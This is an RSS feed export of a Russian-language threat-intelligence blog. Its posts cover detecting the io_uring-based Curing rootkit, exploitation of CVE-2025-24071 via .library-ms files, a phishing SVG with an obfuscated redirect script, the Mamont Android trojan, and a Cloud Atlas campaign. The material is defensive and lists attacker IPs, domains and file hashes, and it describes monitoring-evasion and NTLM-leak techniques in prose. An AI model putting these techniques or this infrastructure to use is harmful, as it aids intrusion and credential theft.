<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>news &#8211; PT ESC</title>
	<atom:link href="/tag/news/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 30 Sep 2026 19:22:03 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>news &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Curing a problem</title>
		<link>/curing-a-problem/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 09 Sep 2025 15:32:17 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/curing-a-problem/</guid>

					<description><![CDATA[Curing a problem 🔧 Недавно исследователи из ARMO представили статью и PoC вредоносного ПО Curing, которое использует интерфейс io_uring для обхода мониторинга файловых и сетевых операций, осуществляемого через системные вызовы. 🧐 Для…]]></description>
										<content:encoded><![CDATA[<p><strong>Curing a problem</strong> 🔧</p>
<p>Недавно исследователи из ARMO <a href="https://www.armosec.io/blog/io_uring-rootkit-bypasses-linux-security/" rel="noopener" target="_blank">представили</a> статью и PoC вредоносного ПО Curing, которое использует интерфейс <code>io_uring</code> для обхода мониторинга файловых и сетевых операций, осуществляемого через системные вызовы.</p>
<p>🧐 Для начала расскажем о самом интерфейсе <code>io_uring</code>. Он появился в версии ядра 5.1 для выполнения асинхронных операций ввода-вывода. До него существовал интерфейс Linux AIO, который тоже предлагал асинхронный ввод-вывод, но имел ряд недостатков. Интерфейс <code>io_uring</code> разрабатывался с учетом этого и предлагает сокращение издержек, связанных с выполнением соответствующих системных вызовов, минуя их, а также реализует сам обмен данными внутри ядра, сокращая переключение контекста между ядром и пользовательским пространством (user-space). Для ввода-вывода используются два кольцевых буфера: очередь отправки (Submission Queue, SQ) и очередь завершения (Completion Queue, CQ), которые используются для постановки операций в очередь и получения результатов соответственно.</p>
<p>🪞 Для примера будем использовать упомянутый выше PoC <a href="https://github.com/armosec/curing" rel="noopener" target="_blank">Curing.</a> Он производит чтение файла /etc/shadow и отправку его на сервер, все это средствами <code>io_uring</code>. Поэтому нет смысла настраивать <code>auditd</code> или другое средство аудита, использующее для мониторинга системные вызовы, так как после настройки интерфейса эти операции будут осуществляться в обход сисколов. В связи с этим для демонстрации аудита будет использоваться <a href="https://github.com/cilium/tetragon" rel="noopener" target="_blank">Tetragon</a> — готовый движок на базе eBPF с возможностью гибко настраивать политики мониторинга через механизм <code>TracingPolicy</code>. Используя механизм привязки <code>kprobes</code>, мы можем подключиться к любой функции ядра для аудита. Существуют и другие интерфейсы, которые можно использовать для аудита доступа к файлам, например fanotify, но Tetragon универсальнее.</p>
<p>Тут стоит отметить, что средства, отслеживающие системные вызовы, не совсем бесполезны в этом случае: они все еще могут перехватывать вызовы функций <code>io_uring_setup</code> и <code>io_uring_enter</code>, используемых для создания и взаимодействия с экземпляром интерфейса <code>io_uring</code>. В этом случае мы будем видеть, что приложение выполняет действия с этим интерфейсом, но подробности операции и ее параметры получить мы не можем. С этим уже можно работать и помечать подобную активность как подозрительную, так как обычно приложения не опираются на <code>io_uring</code>, а легитимных пользователей этого интерфейса можно без особых проблем занести в белый список. Отсюда сам факт обращения к интерфейсу будет подозрительным поведением.</p>
<p>🫥 Но в нашем случае нам требуется постоянный мониторинг файлов или сокетов. Поэтому составим простую политику для мониторинга файлов через LSM-хук security_file_permission (<em>скриншот 1, </em><a href="https://telegra.ph/Politika-dlya-monitoringa-fajlov-09-09" rel="noopener" target="_blank">скопировать код</a>). Сама функция принимает два аргумента: путь к файлу и запрашиваемые разрешения в виде битовой маски, поэтому в политике через оператор <code>Equal</code> ищем файл по полному пути, а в маске через оператор <code>Mask</code> фильтруем по цифре 4, что означает доступ на чтение. И в результате получаем событие (<em>скриншот 2</em>), когда Curing пытается прочитать файл.</p>
<p>Аналогично можно отследить соединение с сервером: в политике (<em>скриншот 3, </em><a href="https://telegra.ph/Politika-dlya-otslezhivaniya-soedineniya-s-serverom-09-09" rel="noopener" target="_blank">скопировать код</a>) используем функцию ядра <code>tcp_connect</code> для получения аргумента <code>sock</code> в ней, где будет вся сетевая информация. Тут у нас нет вводных для фильтрации, и мы увидим все TCP-соединения, так как порт сервера можно переназначить, но тут нам важнее сам факт возможности перехватить событие (<em>скриншот 4</em>) — как мы видим, Curing подключается к своему стандартному порту <code>8888</code>.</p>
<p>Пусть <code>io_uring</code> и предоставляет обход системных вызовов, но, используя правильные инструменты, его можно перехватить без особых проблем.</p>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/09/photo_368@09-09-2025_15-32-18-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_368@09-09-2025_15-32-18-1024x1024.jpg 1024w, /wp-content/uploads/2025/09/photo_368@09-09-2025_15-32-18-300x300.jpg 300w, /wp-content/uploads/2025/09/photo_368@09-09-2025_15-32-18-150x150.jpg 150w, /wp-content/uploads/2025/09/photo_368@09-09-2025_15-32-18-768x768.jpg 768w, /wp-content/uploads/2025/09/photo_368@09-09-2025_15-32-18.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/09/photo_369@09-09-2025_15-32-18-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_369@09-09-2025_15-32-18-1024x1024.jpg 1024w, /wp-content/uploads/2025/09/photo_369@09-09-2025_15-32-18-300x300.jpg 300w, /wp-content/uploads/2025/09/photo_369@09-09-2025_15-32-18-150x150.jpg 150w, /wp-content/uploads/2025/09/photo_369@09-09-2025_15-32-18-768x768.jpg 768w, /wp-content/uploads/2025/09/photo_369@09-09-2025_15-32-18.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/09/photo_370@09-09-2025_15-32-18-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_370@09-09-2025_15-32-18-1024x1024.jpg 1024w, /wp-content/uploads/2025/09/photo_370@09-09-2025_15-32-18-300x300.jpg 300w, /wp-content/uploads/2025/09/photo_370@09-09-2025_15-32-18-150x150.jpg 150w, /wp-content/uploads/2025/09/photo_370@09-09-2025_15-32-18-768x768.jpg 768w, /wp-content/uploads/2025/09/photo_370@09-09-2025_15-32-18.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#tip</span> <span class="hashtag">#news</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>⚠️ Эксперты PT ESC обнаружили попытки эксплуатации уязвимости CVE-2025-24071</title>
		<link>/pt-esc-experts-have-detected-attempts-to-exploit-the-cve-2025-24071-vulnerability/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 21 Mar 2025 17:52:07 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%e2%9a%a0%ef%b8%8f-%d1%8d%d0%ba%d1%81%d0%bf%d0%b5%d1%80%d1%82%d1%8b-pt-esc-%d0%be%d0%b1%d0%bd%d0%b0%d1%80%d1%83%d0%b6%d0%b8%d0%bb%d0%b8-%d0%bf%d0%be%d0%bf%d1%8b%d1%82%d0%ba%d0%b8-%d1%8d%d0%ba%d1%81/</guid>

					<description><![CDATA[⚠️ Эксперты PT ESC обнаружили попытки эксплуатации уязвимости CVE-2025-24071 Уязвимость CVE-2025-24071, затрагивающая широкий спектр операционных систем Windows, включая серверные и клиентские версии Windows 10 и Windows 11, была выявлена 11 марта. CVE-2025-24071…]]></description>
										<content:encoded><![CDATA[<p><strong>⚠️ Эксперты PT ESC обнаружили попытки эксплуатации уязвимости CVE-2025-24071 </strong></p>
<p>Уязвимость <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24071" rel="noopener" target="_blank">CVE-2025-24071</a>, затрагивающая широкий спектр операционных систем Windows, включая серверные и клиентские версии Windows 10 и Windows 11, была выявлена 11 марта. </p>
<p>CVE-2025-24071 связана с механизмом обработки файлов в Windows Explorer и системой индексирования — они автоматически анализируют файл <code>.library-ms</code>, извлекаемый при распаковке вредоносного архива и содержащий ссылку на SMB-ресурс. </p>
<p>Операционная система без взаимодействия с пользователем инициирует NTLM-аутентификацию на атакующем SMB-сервере — это приводит к утечке хеш-суммы NTLMv2 учетной записи жертвы, что может быть использовано для атаки. </p>
<p>Впервые описание и РoС уязвимости <a href="https://cti.monster/blog/2025/03/18/CVE-2025-24071.html" rel="noopener" target="_blank">привел</a> исследователь 0x6rss в своем блоге. Эксперты также <a href="https://www.broadcom.com/support/security-center/protection-bulletin/protection-highlight-malspam-campaign-with-library-ms-file-attachments" rel="noopener" target="_blank">заметили</a>, что уязвимость может использоваться при сохранении файла с расширением <code>.library-ms</code> из электронного письма.</p>
<p>🕵️‍♀️ <strong>Несмотря на то что данные об уязвимости были опубликованы пару дней назад, злоумышленники не спят:</strong> мы уже обнаружили попытки эксплуатации CVE-2025-24071 в организациях в России и Республике Беларусь. </p>
<p>Атакующие распространяют архивы, в которых содержатся документ в формате PDF и файл <code>.library-ms</code> (<em>скриншот 1</em>). Жертва распаковывает архив и запускает PDF-приманку (<em>скриншот 2</em>), в то время как файл <code>.library-ms</code> автоматически и незаметно для пользователя отправляет данные на командный центр злоумышленников.</p>
<p>📈 <strong>Эксперты PT ESC прогнозируют всплеск атак с использованием этой уязвимости.</strong> Мы рекомендуем следующие методы защиты:</p>
<p><strong>•</strong> Ограничить соединения по SMB-протоколу к внешним серверам.<br />
<strong>•</strong> Обновить Windows до последней версии (установить мартовские обновления).<br />
<strong>•</strong> Запретить запуск файлов с расширением <code>.library-ms</code>.<br />
<strong>•</strong> Заблокировать получение файлов с расширением <code>.library-ms</code> по электронной почте.</p>
<p><strong>IoCs</strong></p>
<pre><code>Письмо Минпромторга России от 17.03.2025 № 182544_21 о направлении сведений по кадровому потенциалу предприятий 2025.pdf.library-ms
MD5: c3f9813545b7f830183369dd649bd595 
SHA-1: fcadd1a24f2fa6e0f5338ff0e8d186258c79a05d 
SHA-256: a4205e773eee7f33d1bb776a2f7b36da4b3955284208c015257311b8ef23f721 

Письмо Минпромторга России от 17.03.2025 № 182544_21.zip
MD5: 83a60de9faed1b0a0344eda108aee44f 
SHA-1: 10c02f7a3214dc166f6a8ce19c3d0a988084b3ea
SHA-256: e7897176a7d226c82af27ff525399bd0c7d7b73fdfffac8d2d56b8707637aa99

01 Сопроводительное.pdf.library-ms
MD5: 74e2f206e99040868b60eef04781de8a 
SHA-1: f27ecc7ec9c6425a41a3cbfa8bf74f24c32c6488 
SHA-256: 8a3728ebdb64e69347c14356b250eb0720801ce367acd1b53510a8dea16f7001 

01 Сопроводительное.zip
MD5: 78cd8d4481713fbd4beb790a127bd793 
SHA-1: 595b68aaad8a705e78125735cdb7136b6f17b077 
SHA-256: 07f6d81b5e3fba23f5de34038424ebec4710cbc16959de4389ceb7855e69bac2

spisoc.library-ms
MD5: 9bab71704cefac935546e09d12dfd2c1 
SHA-1: 922c6ee612bd22a85cd1e84f50e18d21656c3f3d 
SHA-256: cb9810b6492aad667554958332a3518aeed8d356dcd03b43e4116cd92c938d0f 

154.205.148.56
38.60.247.250
94.250.249.129
</code></pre>
<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2025/03/photo_246@21-03-2025_17-52-08-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_246@21-03-2025_17-52-08-1024x640.jpg 1024w, /wp-content/uploads/2025/03/photo_246@21-03-2025_17-52-08-300x188.jpg 300w, /wp-content/uploads/2025/03/photo_246@21-03-2025_17-52-08-768x480.jpg 768w, /wp-content/uploads/2025/03/photo_246@21-03-2025_17-52-08.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#win</span> <span class="hashtag">#news</span> <span class="hashtag">#cve</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Графика с сюрпризом: когда векторы скрывают вредоносный код</title>
		<link>/graphics-with-a-twist-when-vectors-hide-malicious-code/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 14:57:03 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%b3%d1%80%d0%b0%d1%84%d0%b8%d0%ba%d0%b0-%d1%81-%d1%81%d1%8e%d1%80%d0%bf%d1%80%d0%b8%d0%b7%d0%be%d0%bc-%d0%ba%d0%be%d0%b3%d0%b4%d0%b0-%d0%b2%d0%b5%d0%ba%d1%82%d0%be%d1%80%d1%8b-%d1%81%d0%ba%d1%80/</guid>

					<description><![CDATA[Графика с сюрпризом: когда векторы скрывают вредоносный код 🤨 В этом посте мы рассмотрим пример фишингового электронного письма, в котором вредоносный контент доставлялся через SVG-файл. Ранее о таком способе обхода средств защиты…]]></description>
										<content:encoded><![CDATA[<p><strong>Графика с сюрпризом: когда векторы скрывают вредоносный код</strong> 🤨</p>
<p>В этом посте мы рассмотрим пример фишингового электронного письма, в котором вредоносный контент доставлялся через SVG-файл. Ранее о таком способе обхода средств защиты информации писали <a href="https://www.anti-malware.ru/news/2024-11-18-111332/44637" rel="noopener" target="_blank">здесь</a>, но сейчас мы более подробно рассмотрим, как это работает. Наши наблюдения за последние недели показали, что половина вредоносных писем с HTML-подобными вложениями содержат именно SVG-файл.</p>
<p><strong>Фишинговое письмо</strong> 🥳</p>
<p>Почтовый образец достаточно скромный: отправлялся от почтового ящика из сервиса GMX, поддерживающего свободную регистрацию; в теме содержал информацию о поступлении квитанции об оплате; тело письма было пустым, а вредоносный SVG-файл был единственным вложением (<em>скриншот 1</em>).</p>
<p><strong>SVG-файл</strong> 😱</p>
<p>Начало файла имеет достаточно обычную SVG-верстку с метаданными, а само тело «изображения» представляет собой загрузку HTML-контента через вызов <code>&lt;foreignObject&gt;</code> (<em>скриншот 2)</em>.</p>
<blockquote><p>Примечание: элемент &lt;foreignObject&gt; в SVG используется для подгрузки других XML-объектов в изображение, в том числе HTML. Подгрузка последнего позволяет наполнить изображение «фишками» HTML, такими как интерактивные объекты или динамический контент.</p></blockquote>
<p>Заранее стоит отметить, что анализируемый образец при открытии не отображается как изображение, а загружаемый им скрипт содержит элементы управления вкладками браузера и редиректами.</p>
<p>Внутри блока символьных данных (<code>&lt;![CDATA[ ... ]]&gt;</code>) определяется константа, волатильная в зависимости от адресата электронного письма. Такой подход позволяет не менять непосредственно код JS-скрипта, встраивая его одинаковым Base64-блоком в элемент <code>&lt;script src=&gt;</code>.</p>
<p><strong>JS-скрипт</strong> 🐈‍⬛️</p>
<p>Подгружаемый скрипт, естественно, обфусцирован, а также наполнен довольно приличным скопом бессмысленных комментариев. </p>
<p>Конфигурация скрипта содержит блоки Base64-данных, но просто декодировав их информацию не получить (<em>скриншот 3</em>).</p>
<p>Далее по скрипту находится функция декодирования и дешифрования данных из конфига, а также запуска блока кода из дешифрованных данных. Его вывод представляет собой JSON-конфиг, а ключ <code>code</code> уже содержит URL-адрес вредоносной страницы (<em>скриншот 4</em>).</p>
<p>В нем мы также видим запрос значения переменной <code>huqe</code> из предыдущего пункта и его подстановку за «якорем» в формируемую URL-ссылку — достаточно известная техника проброса email-адреса получателя в форму сбора учетных записей.</p>
<p>Запуск функций в скрипте осуществляется через <code>window.addEventListener(&quot;DOMContentLoaded&quot;, script_function())</code>, но с учетом того, что никакого DOM скрипт не содержит: сразу запускается код из JSON-ключа code, возвращаемого из функции дешифрования.</p>
<p><code>window.location.assign()</code> запускает редирект на URL-адрес из его параметров. Это говорит о том, что непосредственные манипуляции с пользователем осуществляются уже на отдельной веб-странице, а не внутри SVG-изображения.</p>
<p><strong>Советы</strong> ☕️</p>
<p>Тщательно проверяйте средствами защиты информации поступающие к пользователям образцы SVG-изображений: для них вполне могут подойти признаковые паттерны, используемые для анализа HTML-страниц и другого XML-контента.</p>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/03/photo_236@19-03-2025_14-57-03-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_236@19-03-2025_14-57-03-1024x1024.jpg 1024w, /wp-content/uploads/2025/03/photo_236@19-03-2025_14-57-03-300x300.jpg 300w, /wp-content/uploads/2025/03/photo_236@19-03-2025_14-57-03-150x150.jpg 150w, /wp-content/uploads/2025/03/photo_236@19-03-2025_14-57-03-768x768.jpg 768w, /wp-content/uploads/2025/03/photo_236@19-03-2025_14-57-03.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="597" src="/wp-content/uploads/2025/03/photo_237@19-03-2025_14-57-03-1024x597.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_237@19-03-2025_14-57-03-1024x597.jpg 1024w, /wp-content/uploads/2025/03/photo_237@19-03-2025_14-57-03-300x175.jpg 300w, /wp-content/uploads/2025/03/photo_237@19-03-2025_14-57-03-768x448.jpg 768w, /wp-content/uploads/2025/03/photo_237@19-03-2025_14-57-03.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="582" src="/wp-content/uploads/2025/03/photo_238@19-03-2025_14-57-03-1024x582.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_238@19-03-2025_14-57-03-1024x582.jpg 1024w, /wp-content/uploads/2025/03/photo_238@19-03-2025_14-57-03-300x171.jpg 300w, /wp-content/uploads/2025/03/photo_238@19-03-2025_14-57-03-768x436.jpg 768w, /wp-content/uploads/2025/03/photo_238@19-03-2025_14-57-03.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#phishing</span> <span class="hashtag">#detect</span> <span class="hashtag">#tip</span> <span class="hashtag">#news</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Лох не мамонт, APK не видео</title>
		<link>/a-sucker-is-not-a-mammoth-an-apk-is-not-a-video/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Mon, 10 Feb 2025 12:27:27 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bb%d0%be%d1%85-%d0%bd%d0%b5-%d0%bc%d0%b0%d0%bc%d0%be%d0%bd%d1%82-apk-%d0%bd%d0%b5-%d0%b2%d0%b8%d0%b4%d0%b5%d0%be/</guid>

					<description><![CDATA[Лох не мамонт, APK не видео 🦣 В конце 2024 — начале 2025 года в сети активно обсуждалась информация о распространении в Telegram вируса Mamont. Этот банковский троян, представляющий собой вредоносный .apk-файл,…]]></description>
										<content:encoded><![CDATA[<p><strong>Лох не мамонт, APK не видео</strong> 🦣</p>
<p>В конце 2024 — начале 2025 года в сети активно обсуждалась информация о распространении в Telegram вируса Mamont. Этот банковский троян, представляющий собой вредоносный .apk-файл, встречался нам с именами <code>CBO-Information.apk</code>, <code>Фoтoгpaф.apk</code>, <code>Google Video.apk</code>, <code>Video.apk</code>, <code>Видео.apk</code>, <code>Фото.apk</code>, <code>Photo.apk</code>, <code>Докyмент &lt;Количество штук&gt;.apk</code> и т. п.</p>
<p>При установке на телефон — запрашивает разрешение на установку в качестве приложения для СМС по умолчанию. При закрытии скрывает от пользователя свое присутствие в системе, убирая значок из меню на главном экране. При этом в фоновом режиме собирает информацию об установленных приложениях, о сим-картах, СМС-сообщениях, вызовах, а также другие пользовательские данные и отправляет их на управляющий сервер.</p>
<p>🔑 <strong>Пути проникновения на ваш Android</strong></p>
<p>Неизвестный отправляет вам в мессенджере файл с расширением .apk и спрашивает, <a href="https://www.rbc.ru/life/news/6715e6cc9a7947b296f953d5" rel="noopener" target="_blank">не вы ли изображены</a> на фото или видео. Иногда требует срочно открыть архив с документами, который представляет собой .apk-файл.</p>
<p><strong>Вирус также может попасть на устройство:</strong></p>
<p>• через фишинговые сайты;<br />
• через QR-коды для вступления в <a href="https://msk1.ru/text/incidents/2025/01/22/75015581/" rel="noopener" target="_blank">закрытые группы,</a> каналы и т. п.;<br />
• под видом легитимных приложений (.apk-файлы не с официальных магазинов);<br />
• при наличии физического доступа у злоумышленника.</p>
<p>🔐 <strong>Как не попасться</strong></p>
<p>1️⃣ Будьте более внимательными: <br />
• не переходите по ссылкам из сообщений, не посмотрев, куда они ведут;<br />
• не вводите данные учетной записи на подозрительных ресурсах;<br />
• избегайте сканирования QR-кодов в общественных местах (они могут вести на фишинговые сайты);<br />
• не открывайте файлы из недоверенных источников.</p>
<p>2️⃣ Настройте конфиденциальность в мессенджере. Вы можете <a href="https://telegram.org/faq" rel="noopener" target="_blank">запретить</a> приглашать вас в группы и отключить получение СМС-сообщений от незнакомых пользователей («Настройки» → «Конфиденциальность»).</p>
<p>3️⃣ При получении от знакомого голосовых, СМС- и видеосообщений с необычными просьбами свяжитесь с ним через альтернативные каналы (злоумышленники часто используют <a href="https://t.me/centralbank_russia/1933" rel="noopener" target="_blank">дипфейки).</a></p>
<p>4️⃣ Не храните пароли и банковские реквизиты в избранных сообщениях и чатах.</p>
<p>5️⃣ Устанавливайте приложения только из официальных магазинов и с сайтов разработчиков. Проверяйте запрашиваемые разрешения: если приложение требует доступ к данным, не соответствующим его функциональности, это может указывать на вредоносное ПО.</p>
<p>6️⃣ Регулярно проверяйте список установленных приложений — раздел «Приложения» («Установленные файлы» и т. п.) в параметрах устройства. Некоторое вредоносное ПО скрывает себя от пользователя. Можно также использовать средства для мониторинга активности, которые уведомят о подозрительных действиях.</p>
<p>7️⃣ Обращайте внимание на уведомления и поведение устройства. Если приходит много нетипичных уведомлений или устройство сильно нагревается в неактивном состоянии, это может быть признаком того, что оно заражено.</p>
<p>8️⃣ Регулярно обновляйте ОС и приложения. В обновлениях часто содержатся исправления безопасности.</p>
<p>9️⃣ Используйте проверенные антивирусы.</p>
<p>1️⃣0️⃣ Для защиты от физического доступа к устройству используйте надежный пароль.</p>
<p>1️⃣1️⃣ Регулярно создавайте резервные копии данных и храните их в безопасном месте.</p>
<p>1️⃣2️⃣ Для оценки ущерба при заражении мобильного устройства проведите его <a href="https://www.ptsecurity.com/ru-ru/services/esc/?utm_source=tg_esc&#038;utm_medium=post&#038;utm_campaign=10_02/#response" rel="noopener" target="_blank">исследование.</a> </p>
<p>1️⃣3️⃣ Постоянно обучайтесь и будьте в курсе новых угроз. Для общей осведомленности можете пройти бесплатные курсы Positive Technologies — <a href="https://edu.ptsecurity.com/antihackingcourse/?utm_source=tg_esc&#038;utm_medium=post&#038;utm_campaign=10_02" rel="noopener" target="_blank">«Личная кибербезопасность»</a> и <a href="https://edu.ptsecurity.com/cybersecuritycourse/?utm_source=tg_esc&#038;utm_medium=post&#038;utm_campaign=10_02" rel="noopener" target="_blank">«Базовая кибербезопасность: первое погружение».</a></p>
<p>💡 <strong>Помните, что APK (Android Package Kit)</strong> — это формат, используемый в контексте приложений, но никак не для фото- и видеофайлов.</p>
<p>🎁 <strong>Бонус</strong>: опубликовали IoCs за 2025 год <a href="https://telegra.ph/Mamont-IoCs-02-07" rel="noopener" target="_blank">в Telegraph</a><a href="https://telegra.ph/Mamont-IoCs-02-07" rel="noopener" target="_blank">.</a></p>
<p><span class="hashtag">#news</span> <span class="hashtag">#tips</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Облачные сервисы от оператора «МеХаФон»</title>
		<link>/cloud-services-from-the-operator-mehafon/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 15 Nov 2024 15:37:32 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[news]]></category>
		<guid isPermaLink="false">/%d0%be%d0%b1%d0%bb%d0%b0%d1%87%d0%bd%d1%8b%d0%b5-%d1%81%d0%b5%d1%80%d0%b2%d0%b8%d1%81%d1%8b-%d0%be%d1%82-%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%82%d0%be%d1%80%d0%b0-%d0%bc%d0%b5%d1%85%d0%b0%d1%84/</guid>

					<description><![CDATA[📲 Облачные сервисы от оператора «МеХаФон» Новости с полей: команда PT ESC наблюдает новую кампанию группировки Cloud Atlas, нацеленную на государственные организации из России и стран СНГ. Про эту группировку мы рассказывали…]]></description>
										<content:encoded><![CDATA[<p>📲 <strong>Облачные сервисы от оператора «МеХаФон»</strong></p>
<p>Новости с полей: команда PT ESC наблюдает новую кампанию группировки Cloud Atlas, нацеленную на государственные организации из России и стран СНГ. Про эту группировку мы рассказывали в нашем исследовании <a href="https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/apt-cloud-atlas-unbroken-threat/" rel="noopener" target="_blank">APT Cloud Atlas: Unbroken Threat</a> и в <a href="https://t.me/ptescalator/46" rel="noopener" target="_blank">посте</a>.</p>
<p>📝 В качестве исходного вектора в своих атаках злоумышленники традиционно используют фишинговые письма с вредоносным вложением «<code>О представлении информации.doc</code>» (VirusTotal 0/62). Рассылка осуществляется с адресов <code>@internet.ru</code>. Такой домен почтового адреса можно получить при регистрации на сервисе <code>mail.ru</code>.</p>
<p>Примечательно, что атакующие не изменяют себе и с 2014 года используют облачные сервисы. При этом они продолжают экспериментировать, и раз за разом в их арсенал добавляются новые популярные платформы. Поэтому в первую очередь мы настоятельно рекомендуем проверить все сессии по протоколу «<a href="https://yandex.ru/dev/disk/doc/ru/" rel="noopener" target="_blank">Яндекс Диск WebDAV</a>» (<code>webdav.yandex.ru</code>) и запросы через <a href="https://developers.google.com/sheets/api/reference/rest" rel="noopener" target="_blank">Google Sheets API</a> (<code>oauth2.googleapis.com</code>, <code>sheets.googleapis.com</code>).</p>
<p><strong>IoCs:</strong></p>
<pre><code>
mehafon.com
technoguides.org

9943fee873c0642216d1578fc4373648b670b5bc47a8bf37366063041518f8b2
</code></pre>
<p>Happy hunting and stay tuned!</p>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-1024x1024.jpg 1024w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-300x300.jpg 300w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-150x150.jpg 150w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-768x768.jpg 768w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-1024x1024.jpg 1024w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-300x300.jpg 300w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-150x150.jpg 150w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-768x768.jpg 768w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
